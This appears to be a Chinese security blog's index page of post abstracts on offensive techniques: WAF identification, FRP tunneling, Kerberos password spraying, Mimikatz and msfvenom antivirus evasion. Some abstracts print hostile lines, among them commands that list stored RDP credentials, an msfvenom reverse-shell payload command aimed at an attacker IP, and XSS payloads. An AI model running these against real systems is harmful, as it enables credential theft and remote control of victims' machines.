上一页 1 2 3 4 5 6 7 8 ··· 16 下一页
摘要: windows shell使用指南 终端工具 Fluent Terminal Fluent Terminal 是是专属于 Windows 平台,利用 UWP 技术打造的颜值超高的终端模拟器,其响应速度仅稍逊于自带的默认 PowerShell 终端,设置是 GUI 方式的,而且功能非常强大,值得推荐。 阅读全文
posted @ 2021-09-20 21:28 tomyyyyy 阅读(1275) 评论(0) 推荐(0) 编辑
摘要: 一、防抓包机制 正所谓”知己知彼,百战不殆“,只有仔细钻研敌人的防御手段,我们才可以有针对性的突破他们的防御措施,获取到我们所需要的通信数据。因此我们首先需要做的就是研究敌人的防范手段。 市面上的各种应用层抓包软件的实现原理基本都是中间人攻击(MITM),包括大家常用的Burpsuite、Fiddl 阅读全文
posted @ 2021-09-18 23:27 tomyyyyy 阅读(991) 评论(0) 推荐(0) 编辑
摘要: 看图识WAF 转载自潇湘信安 记录常见WAF拦截页面 1. D盾 2.云锁 3. UPUPW安全防护 4.宝塔网站防火墙 5.网防G01 6. 护卫神 7. 网站安全狗 8. 智创防火墙 9. 360主机卫士或360webscan 10.西数WTS-WAF 11. Naxsi WAF 12. 腾讯云 阅读全文
posted @ 2021-08-28 00:08 tomyyyyy 阅读(309) 评论(0) 推荐(1) 编辑
摘要: 1、FRP介绍 frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 官网:https://gofrp.org Github:https://github.com/fat 阅读全文
posted @ 2021-08-27 23:25 tomyyyyy 阅读(1580) 评论(0) 推荐(0) 编辑
摘要: RDP登录凭据获取 当用户在RDP登录时点击了保存登录凭据,获取凭据可以使用以下几种方法 #查看mstsc的连接记录 cmdkey /list #查找本地的Credentials dir /a %userprofile%\appdata\local\microsoft\credentials\* M 阅读全文
posted @ 2021-08-27 10:42 tomyyyyy 阅读(302) 评论(0) 推荐(1) 编辑
摘要: 域内用户名枚举和密码喷洒 于Kerberos本身是一种基于身份认证的协议,所以也可对进行暴力破解或用户名枚举,并且不需要域用户下,只要攻击者所控的机器可以与域控的KDC正常通信即可(可以ping通) 实验 我这里实验主要是域控administrator、域成员af、还有一台非域机。 nmap -p 阅读全文
posted @ 2021-08-27 08:43 tomyyyyy 阅读(1020) 评论(0) 推荐(1) 编辑
摘要: mimikazi教程 1、简介 1.1、背景介绍 Mimikatz 是从 Windows 系统中收集凭证数据最好的工具之一。由于 Mimikatz 的作者 Benjamin Delpy 是法国人,所以描述关于 Mimikatz 用法的资源都是法语的,至少在他的博客中是这样的。 Mimikatz 的 阅读全文
posted @ 2021-08-24 20:20 tomyyyyy 阅读(1134) 评论(0) 推荐(0) 编辑
摘要: msfvenom——木马免杀篇 c语言执行 生成shellcode.c msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c 然 阅读全文
posted @ 2021-08-24 09:40 tomyyyyy 阅读(1721) 评论(0) 推荐(0) 编辑
摘要: 伪造mysql服务端 原理概述 MySQL客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客服端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直接就丢掉了,所以第二步就是根据服务端的响 阅读全文
posted @ 2021-08-23 16:25 tomyyyyy 阅读(208) 评论(0) 推荐(0) 编辑
摘要: XSS绕过常见方式 转载自https://www.cnblogs.com/bingtang123/p/12844659.html XSS常见方式 1.<script>alert(1)</script> 2.源码第一个,[<]被转义,因此在第二个里 "><script>alert(1)</script 阅读全文
posted @ 2021-08-12 19:58 tomyyyyy 阅读(662) 评论(0) 推荐(2) 编辑
上一页 1 2 3 4 5 6 7 8 ··· 16 下一页